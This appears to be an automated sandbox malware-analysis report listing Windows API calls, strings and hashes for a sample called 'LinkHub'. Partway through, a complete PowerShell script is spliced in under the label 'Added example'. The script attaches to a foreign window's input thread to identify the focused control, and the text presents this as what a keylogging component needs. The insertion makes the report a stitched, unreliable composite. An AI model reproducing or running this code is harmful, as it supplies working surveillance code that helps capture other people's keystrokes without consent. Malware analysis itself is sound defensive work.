                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 66c71cac0d62ebf2205e230d2afbbb416e53ee8600fd418d88a4681eadb3d2b9
                                                                                        • Instruction ID: 7f1f606e193153bfd9836895c4399e6857113f01207cf0ec4c68bdc925bd3f31
                                                                                        • Opcode Fuzzy Hash: 66c71cac0d62ebf2205e230d2afbbb416e53ee8600fd418d88a4681eadb3d2b9
                                                                                        • Instruction Fuzzy Hash: 70113231260248BEEF206F69CC06FAB3BA8EF89B64F110115FA50E20A0C271DC21DB20
                                                                                        APIs
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                          • Part of subcall function 002636F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00263712
                                                                                          • Part of subcall function 002636F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00263723
                                                                                          • Part of subcall function 002636F4: GetCurrentThreadId.KERNEL32 ref: 0026372A
                                                                                          • Part of subcall function 002636F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00263731
                                                                                        • GetFocus.USER32 ref: 002638C4
                                                                                          • Part of subcall function 0026373B: GetParent.USER32(00000000), ref: 00263746
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0026390F
                                                                                        • EnumChildWindows.USER32(?,00263987), ref: 00263937
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 1272988791-1110647743
                                                                                        • Opcode ID: 9dcf240032bd8905d0e40773ba5dc8ed63a059b5e2ae4214141944d4f5e05b7c
                                                                                        • Instruction ID: 587930c8bd56b090cfd70e4aa96cd3475088ae874589ed478cf93f4979054f52
                                                                                        • Opcode Fuzzy Hash: 9dcf240032bd8905d0e40773ba5dc8ed63a059b5e2ae4214141944d4f5e05b7c
                                                                                        • Instruction Fuzzy Hash: C411E7716102056BCF11BF74DD85AEE77AA9F94300F004069B9499B293CE705965DF30
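Added example, not the sample's own code: the subcall chain listed for this function (SendMessageTimeoutW with WM_NULL and SMTO_ABORTIFHUNG at a 5000 ms timeout, GetWindowThreadProcessId, GetCurrentThreadId, AttachThreadInput, then GetFocus and GetClassNameW with a 0x100-character buffer) is the standard way for one process to learn which control inside another process's window currently holds keyboard focus, since GetFocus only answers for the calling thread's own input queue. The PowerShell below reproduces that chain via P/Invoke against the foreground window; the start-up delay, the helper name Get-ForeignFocusedControl and the returned fields are assumptions, and the EnumChildWindows walk that follows in the listing is not reproduced.

```powershell
# Added example: replays the focus-probe call chain listed above against the foreground window.
# Not the sample's code; helper name, delay and output fields are assumptions.
$sig = @'
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr GetForegroundWindow();

[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr SendMessageTimeoutW(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam,
                                                uint fuFlags, uint uTimeout, out IntPtr lpdwResult);

[DllImport("user32.dll", SetLastError = true)]
public static extern uint GetWindowThreadProcessId(IntPtr hWnd, IntPtr lpdwProcessId);

[DllImport("kernel32.dll")]
public static extern uint GetCurrentThreadId();

[DllImport("user32.dll", SetLastError = true)]
public static extern bool AttachThreadInput(uint idAttach, uint idAttachTo, bool fAttach);

[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr GetFocus();

[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern int GetClassNameW(IntPtr hWnd, System.Text.StringBuilder lpClassName, int nMaxCount);
'@
$u32 = Add-Type -MemberDefinition $sig -Name 'FocusProbe' -Namespace 'Win32' -PassThru

function Get-ForeignFocusedControl {
    param([int]$DelaySeconds = 3)   # time to click into another window before the probe runs

    $WM_NULL = 0
    $SMTO_ABORTIFHUNG = 2

    Start-Sleep -Seconds $DelaySeconds
    $target = $u32::GetForegroundWindow()
    if ($target -eq [IntPtr]::Zero) { return $null }

    # SendMessageTimeoutW(hwnd, WM_NULL, 0, 0, SMTO_ABORTIFHUNG, 5000): give up if the window is hung,
    # because AttachThreadInput against a hung thread would block this thread as well
    [IntPtr]$res = [IntPtr]::Zero
    $alive = $u32::SendMessageTimeoutW($target, $WM_NULL, [IntPtr]::Zero, [IntPtr]::Zero,
                                       $SMTO_ABORTIFHUNG, 5000, [ref]$res)
    if ($alive -eq [IntPtr]::Zero) { return $null }

    # GetFocus reports focus for the caller's input queue only, so share the target thread's queue first
    $targetTid = $u32::GetWindowThreadProcessId($target, [IntPtr]::Zero)
    $myTid     = $u32::GetCurrentThreadId()
    $attached  = ($targetTid -ne $myTid) -and $u32::AttachThreadInput($myTid, $targetTid, $true)
    try {
        $focused = $u32::GetFocus()
    }
    finally {
        if ($attached) { $null = $u32::AttachThreadInput($myTid, $targetTid, $false) }
    }
    if ($focused -eq [IntPtr]::Zero) { return $null }

    # GetClassNameW with a 0x100-character buffer, as in the listing
    $cls = New-Object System.Text.StringBuilder 0x100
    $null = $u32::GetClassNameW($focused, $cls, $cls.Capacity)

    [pscustomobject]@{
        Window         = $target
        FocusedControl = $focused
        ClassName      = $cls.ToString()
    }
}

Get-ForeignFocusedControl
```

Run it from a console, then click into another application before the delay expires: the returned class name (for example an Edit control) identifies which control in that foreign window would receive keystrokes, which is the information a keylogging component needs in order to label captured input.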
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(?), ref: 00205A34
                                                                                        • DestroyWindow.USER32(?,002037B8,?,?,?,?,?,00203709,?,?), ref: 00205A91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyObjectWindow
                                                                                        • String ID: <)-$<)-
                                                                                        • API String ID: 2587070983-3907340304
                                                                                        • Opcode ID: 0b64b9c9f0e7e1488161ed86e13bfe229358307d789df4549e89fc24675eb973
                                                                                        • Instruction ID: f5fe163625123fadcf1efeffb069f0601eb6a31d2e60a6a1985041d31193cc5b
                                                                                        • Opcode Fuzzy Hash: 0b64b9c9f0e7e1488161ed86e13bfe229358307d789df4549e89fc24675eb973
                                                                                        • Instruction Fuzzy Hash: 2421EA30B27656CFDB18AF15F8A8BA633E0AB64311F25415AE401972A2CB749C69CF14
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00296360
                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0029638D
                                                                                        • DrawMenuBar.USER32(?), ref: 0029639C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                        • String ID: 0
                                                                                        • API String ID: 3227129158-4108050209
                                                                                        • Opcode ID: 19863d59ec054bb4f672175b3f295748e4ba831b52f701214bec0bc6e08a3a87
                                                                                        • Instruction ID: 8e2e69ddbd863ce147466d37262332779200509749cff4e68f58ec07c9c194bf
                                                                                        • Opcode Fuzzy Hash: 19863d59ec054bb4f672175b3f295748e4ba831b52f701214bec0bc6e08a3a87
                                                                                        • Instruction Fuzzy Hash: 09018031520218AFDF119F51EC88BAE7BB4FF45751F10809AE849D6151DB708AA5EF21
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,002D28E0,0029AD55,000000FC,?,00000000,00000000,?), ref: 0029823F
                                                                                        • GetFocus.USER32 ref: 00298247
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002982B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                        • String ID: (-
                                                                                        • API String ID: 3601265619-4239615555
                                                                                        • Opcode ID: 022cbab31f93a4448f21dcbe6974b0ac4ffae4bbf5e1bee0acda3128f785046f
                                                                                        • Instruction ID: 26535eae311e3723cac94acf402c0eb04a78fddbeb8cf3a0990892db2ab04a5e
                                                                                        • Opcode Fuzzy Hash: 022cbab31f93a4448f21dcbe6974b0ac4ffae4bbf5e1bee0acda3128f785046f
                                                                                        • Instruction Fuzzy Hash: 37017531A12541CFC715DF78E858EA573E6EB8B320F18015EE816873A1CB316C1BCB50
                                                                                        APIs
                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 00298576
                                                                                        • CreateAcceleratorTableW.USER32(00000000,?,?,?,0027BE96,00000000,00000000,?,00000001,00000002), ref: 0029858C
                                                                                        • GetForegroundWindow.USER32(?,0027BE96,00000000,00000000,?,00000001,00000002), ref: 00298595
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                        • String ID: (-
                                                                                        • API String ID: 986409557-4239615555
                                                                                        • Opcode ID: e86cdbc890d0c42f7058d6a417ba5f9b4d8e6ed768460e70c6f8c440624090d9
                                                                                        • Instruction ID: c6fd8ee070841a25581e072008caeca12b6eeb51ae3c574f4af3a52cc23eec87
                                                                                        • Opcode Fuzzy Hash: e86cdbc890d0c42f7058d6a417ba5f9b4d8e6ed768460e70c6f8c440624090d9
                                                                                        • Instruction Fuzzy Hash: 47016930A12305CFCF249F68EC9CAA577A1FB25321F6A451AE515972B0DB30ACADDF50
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002D4038,002D407C), ref: 00298C1A
                                                                                        • CloseHandle.KERNEL32 ref: 00298C2C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: 8@-$|@-
APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002A0BD4,?), ref: 00260EE0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002A0BD4,?), ref: 00260EF8
• CLSIDFromProgID.OLE32(?,?,00000000,0029DCE0,000000FF,?,00000000,00000800,00000000,?,002A0BD4,?), ref: 00260F1D
• _memcmp.LIBVCRUNTIME ref: 00260F3E
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0028B10C
• Process32FirstW.KERNEL32(00000000,?), ref: 0028B11A
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
• Process32NextW.KERNEL32(00000000,?), ref: 0028B1FC
• CloseHandle.KERNEL32(00000000), ref: 0028B20B
  • Part of subcall function 0021E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00244D73,?), ref: 0021E395
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
APIs
Similarity
• API ID: _free
• String ID:
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 0028255A
• WSAGetLastError.WSOCK32 ref: 00282568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002825E7
• WSAGetLastError.WSOCK32 ref: 002825F1
Similarity
• API ID: ErrorLast$socket
• String ID:
APIs
• GetWindowRect.USER32(?,?), ref: 00296D1A
• ScreenToClient.USER32(?,?), ref: 00296D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00296DBA
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002761C8
• GetLastError.KERNEL32(?,00000000), ref: 002761EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00276213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0027623F
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0026B473
• SetKeyboardState.USER32(00000080), ref: 0026B48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0026B4FD
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0026B54F
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 4bc19b1bd459bfacc0a96638a51d14803fcc656ee36cad5f1497ff9d4324ab6b
                                                                                        • Instruction ID: 0a8d8cf479d666f9567de7e7f1975a6b41c98cd5b11e5daa41b16461b18b6a8a
                                                                                        • Opcode Fuzzy Hash: 4bc19b1bd459bfacc0a96638a51d14803fcc656ee36cad5f1497ff9d4324ab6b
                                                                                        • Instruction Fuzzy Hash: A1318D70A202496EFF32CF24D8187FA7B79AF44310F44421AE192D61D2C77489E18BA1
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0026B5B8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0026B5D4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0026B63B
                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0026B68D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 0ce067e676a47f6e80a72f53160b6280e8a7728c2e59b60793c80ea49c8662ad
                                                                                        • Instruction ID: 17e8addd8a08376e694f2fe2e391374a389096e56622696fc91debbcc1d5e2a8
                                                                                        • Opcode Fuzzy Hash: 0ce067e676a47f6e80a72f53160b6280e8a7728c2e59b60793c80ea49c8662ad
                                                                                        • Instruction Fuzzy Hash: D1312B30D606096EFF368F65C8097FA7BAEEF85310F04822AE485D61D1C3748AE59B91
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 002980D4
                                                                                        • GetWindowRect.USER32(?,?), ref: 0029814A
                                                                                        • PtInRect.USER32(?,?,?), ref: 0029815A
                                                                                        • MessageBeep.USER32(00000000), ref: 002981C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 90766ef4cb0dfa0298a53508092f70e6aa57260e9fa05b70f59aa06d32ce407b
                                                                                        • Instruction ID: ae87fd42c16d5408e3c21a28601b3dbd51aa2d1867dfab128dce97c072e8e56d
                                                                                        • Opcode Fuzzy Hash: 90766ef4cb0dfa0298a53508092f70e6aa57260e9fa05b70f59aa06d32ce407b
                                                                                        • Instruction Fuzzy Hash: F941BF30A11215DFCF15CF58E884AA9B7F5FF46314F1840A9EA489B261CB31EC56CF40
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00292187
                                                                                          • Part of subcall function 00264393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002643AD
                                                                                          • Part of subcall function 00264393: GetCurrentThreadId.KERNEL32 ref: 002643B4
                                                                                          • Part of subcall function 00264393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00262F00), ref: 002643BB
                                                                                        • GetCaretPos.USER32(?), ref: 0029219B
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 002921E8
                                                                                        • GetForegroundWindow.USER32 ref: 002921EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 1b77af143a57ce0e603ff55a432163a68d31315c57de94a1bb795004e9661300
                                                                                        • Instruction ID: 8eec594abbbb3e6823eabc7fa1bf173e5e4598f2d1750e73a650c5eb69981495
                                                                                        • Opcode Fuzzy Hash: 1b77af143a57ce0e603ff55a432163a68d31315c57de94a1bb795004e9661300
                                                                                        • Instruction Fuzzy Hash: CF317271D10209AFCB04EFA9C881CAEB7FCEF48304B5484AAE455E7252D7719E55CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • _wcslen.LIBCMT ref: 0026E8E2
                                                                                        • _wcslen.LIBCMT ref: 0026E8F9
                                                                                        • _wcslen.LIBCMT ref: 0026E924
                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0026E92F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                        • String ID:
                                                                                        • API String ID: 3763101759-0
                                                                                        • Opcode ID: 88e1fefbd5834a70dab62a741245fea4b0246c117d1c8d6d863fd3a1e07cc58e
                                                                                        • Instruction ID: 3cd01888e3926bcde9d36bcf1044f6858c465ad291e88ea0c91a4c2ab2d18fd3
                                                                                        • Opcode Fuzzy Hash: 88e1fefbd5834a70dab62a741245fea4b0246c117d1c8d6d863fd3a1e07cc58e
                                                                                        • Instruction Fuzzy Hash: 7E21D375D11225FFCB10AFA8D982BAEB7F8EF45350F114065F804BB281D6709E618BA1
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,0029DC30), ref: 0026DBA6
                                                                                        • GetLastError.KERNEL32 ref: 0026DBB5
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0026DBC4
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0029DC30), ref: 0026DC21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 2267087916-0
                                                                                        • Opcode ID: 376ec96c4bf759a61b2cf0be54e9272eb9953094104627721e98ded1ef092c3c
                                                                                        • Instruction ID: b3562fb287d05ac7369ff3a39fdd7b4d4b6610fd0c8f19ecd32fa7c0f958d295
                                                                                        • Opcode Fuzzy Hash: 376ec96c4bf759a61b2cf0be54e9272eb9953094104627721e98ded1ef092c3c
                                                                                        • Instruction Fuzzy Hash: DC21A630A243099FC710DF28C98495BB7E8EE5A764F100A1AF499C32E2D770D996DF52
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 002932A6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002932C0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002932CE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002932DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 08a64b81bc0a6d8c72cf658baefccaf119440a464b2d0f8d21ce4db593eab068
                                                                                        • Instruction ID: 3b1ff83bb8cb8e41474a4e740e337846475c5195f452f6de769e9e168f8a8553
                                                                                        • Opcode Fuzzy Hash: 08a64b81bc0a6d8c72cf658baefccaf119440a464b2d0f8d21ce4db593eab068
                                                                                        • Instruction Fuzzy Hash: 73210631614111AFDB14DF24CC45FAABB99EF85314F248259F82A8B2D2C771ED51CBD0
                                                                                        APIs
